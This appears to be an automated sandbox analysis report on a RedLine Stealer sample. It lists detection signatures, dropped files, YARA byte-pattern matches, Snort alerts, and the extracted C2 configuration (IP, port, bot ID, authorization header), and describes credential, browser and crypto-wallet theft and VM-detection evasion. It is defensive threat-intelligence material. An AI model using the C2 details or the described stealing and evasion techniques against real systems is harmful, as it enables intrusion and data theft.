Windows Analysis Report
W7ANVukbbj.exe

Overview

General Information

Sample Name:W7ANVukbbj.exe
Original Sample Name:093a149ea955420c85d54127e964879a.exe
Analysis ID:815798
MD5:093a149ea955420c85d54127e964879a
SHA1:ecef28b8b5ed66fc1226fc0c9e2ce98b89523e76
SHA256:fd7f4611b78c0f0b264159fcc744604e1a089f9faa381c8e4414a123ff568d19
Tags:exe, RedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • W7ANVukbbj.exe (PID: 6056 cmdline: C:\Users\user\Desktop\W7ANVukbbj.exe MD5: 093A149EA955420C85D54127E964879A)
    • twl97yF91.exe (PID: 3776 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe MD5: 8B79F6A1B67F97CA971CEF540ABF22E7)
    • uPD30tM82.exe (PID: 5176 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe MD5: 763CFA2A099AC8748401DF32FF369ACE)
  • rundll32.exe (PID: 4184 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
Name:RedLine Stealer
Description:RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution:No Attribution
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "193.233.20.23:4123", "Bot Id": "ramon", "Authorization Header": "3197576965d9513f115338c233015b40"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
    dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
      Source | Rule | Description | Author | Strings
      C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
        • 0x1a440:$pat14: , CommandLine:
        • 0x134ab:$v2_1: ListOfProcesses
        • 0x1328a:$v4_3: base64str
        • 0x13e03:$v4_4: stringKey
        • 0x11b63:$v4_5: BytesToStringConverted
        • 0x10d76:$v4_6: FromBase64
        • 0x12098:$v4_8: procName
        • 0x12813:$v5_5: FileScanning
        • 0x11d6c:$v5_7: RecordHeaderField
        • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
        Source | Rule | Description | Author | Strings
        00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
          00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 A8 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
            00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 A8 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            0000000E.00000000.337013680.00000000002B2000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
              Source | Rule | Description | Author | Strings
              1.2.twl97yF91.exe.400000.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
                1.2.twl97yF91.exe.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
                • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                • 0x1300:$s3: 83 EC 38 53 B0 A8 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                • 0x1fdd0:$s5: delete[]
                • 0x1f288:$s6: constructor or from DllMain.
                0.3.W7ANVukbbj.exe.4a26820.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
                  0.3.W7ANVukbbj.exe.4a26820.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
                  • 0x18840:$pat14: , CommandLine:
                  • 0x118ab:$v2_1: ListOfProcesses
                  • 0x1168a:$v4_3: base64str
                  • 0x12203:$v4_4: stringKey
                  • 0xff63:$v4_5: BytesToStringConverted
                  • 0xf176:$v4_6: FromBase64
                  • 0x10498:$v4_8: procName
                  • 0x10c13:$v5_5: FileScanning
                  • 0x1016c:$v5_7: RecordHeaderField
                  • 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  1.2.twl97yF91.exe.2f97bc6.2.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
                    No Sigma rule has matched
                    Timestamp:02/27/23-09:31:19.481059
                    Source IP:192.168.2.3
                    Destination IP:193.233.20.23
                    SID:2043233
                    Source Port:49736
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:02/27/23-09:31:37.882033
                    Source IP:192.168.2.3
                    Destination IP:193.233.20.23
                    SID:2043231
                    Source Port:49736
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:02/27/23-09:30:29.261461
                    Source IP:192.168.2.3
                    Destination IP:193.233.20.23
                    SID:2043233
                    Source Port:49699
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:02/27/23-09:31:21.995610
                    Source IP:193.233.20.23
                    Destination IP:192.168.2.3
                    SID:2043234
                    Source Port:4123
                    Destination Port:49736
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:02/27/23-09:30:46.338879
                    Source IP:192.168.2.3
                    Destination IP:193.233.20.23
                    SID:2043231
                    Source Port:49699
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:02/27/23-09:30:34.424527
                    Source IP:193.233.20.23
                    Destination IP:192.168.2.3
                    SID:2043234
                    Source Port:4123
                    Destination Port:49699
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    AV Detection

                    Source: W7ANVukbbj.exe | ReversingLabs: Detection: 71%
                    Source: W7ANVukbbj.exe | Virustotal: Detection: 48%
                    Source: W7ANVukbbj.exe | Avira: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe | ReversingLabs: Detection: 64%
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe | ReversingLabs: Detection: 76%
                    Source: W7ANVukbbj.exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe | Joe Sandbox ML: detected
                    Source: 00000001.00000003.257010194.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.23:4123", "Bot Id": "ramon", "Authorization Header": "3197576965d9513f115338c233015b40"}
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe | Code function: 0_2_00862F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00862F1D

                    Compliance

                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe | Unpacked PE file: 1.2.twl97yF91.exe.400000.0.unpack
                    Source: W7ANVukbbj.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: W7ANVukbbj.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: wextract.pdb source: W7ANVukbbj.exe
                    Source: Binary string: wextract.pdbGCTL source: W7ANVukbbj.exe
                    Source: Binary string: ,C:\fokizacawova\vamisobel.pdb source: W7ANVukbbj.exe, 00000000.00000003.254929355.00000000049C9000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000000.255172921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, twl97yF91.exe.0.dr
                    Source: Binary string: _.pdb source: twl97yF91.exe, 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000003.259177434.0000000002F0D000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\fokizacawova\vamisobel.pdb source: W7ANVukbbj.exe, 00000000.00000003.254929355.00000000049C9000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000000.255172921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, twl97yF91.exe.0.dr
                    Source: C:\Users\user\Desktop\W7ANVukbbj.exe | Code function: 0_2_00862390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00862390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 1_2_0305EE30

                    Networking

                    Source: Traffic | Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49699 -> 193.233.20.23:4123
                    Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49699 -> 193.233.20.23:4123
                    Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.23:4123 -> 192.168.2.3:49699
                    Source: Traffic | Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49736 -> 193.233.20.23:4123
                    Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49736 -> 193.233.20.23:4123
                    Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.23:4123 -> 192.168.2.3:49736
                    Source: Malware configuration extractor | URLs: 193.233.20.23:4123
                    Source: Joe Sandbox View | ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
                    Source: Joe Sandbox View | IP Address: 193.233.20.23
                    Source: global traffic | TCP traffic: 192.168.2.3:49699 -> 193.233.20.23:4123
                    Source: unknown | TCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
